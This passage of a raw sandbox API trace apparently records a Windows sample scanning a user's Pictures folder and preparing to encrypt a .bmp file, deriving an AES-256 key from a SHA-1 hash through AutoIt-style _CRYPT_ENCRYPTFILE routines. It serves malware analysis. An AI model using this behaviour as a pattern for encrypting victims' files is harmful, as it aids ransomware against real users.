[0189.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hluVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="luVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uVFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FFklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fklat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lat\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="at\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CNlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NlXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lXKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XKQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KQK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QK1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K1zNg.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.122] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.122] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0189.122] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.122] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.122] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.122] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.122] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.122] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.122] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0189.122] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.bmp", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8ea490, ftCreationTime.dwHighDateTime=0x1d5da3a, ftLastAccessTime.dwLowDateTime=0xb4730110, ftLastAccessTime.dwHighDateTime=0x1d5e3b1, ftLastWriteTime.dwLowDateTime=0xb4730110, ftLastWriteTime.dwHighDateTime=0x1d5e3b1, nFileSizeHigh=0x0, nFileSizeLow=0x8f3a, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="CNlXKQK1zNg.bmp", cAlternateFileName="CNLXKQ~1.BMP")) returned 0x90af58 [0189.122] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0189.123] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.123] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.123] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0189.123] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0189.123] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.128] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.128] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0189.129] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0189.129] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.129] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0189.129] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.129] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.129] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.129] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.129] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.129] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0189.130] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0189.130] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.130] CryptHashData (hHash=0x90ae18, pbData=0x8ded08, dwDataLen=0x19, dwFlags=0x1) returned 1 [0189.130] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.130] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.130] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.130] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0189.130] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.131] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.131] CryptDestroyHash (hHash=0x90ae18) returned 1 [0189.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0189.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0189.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0189.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0189.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0189.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0189.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0189.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0189.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0189.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0189.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0189.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0189.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0189.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 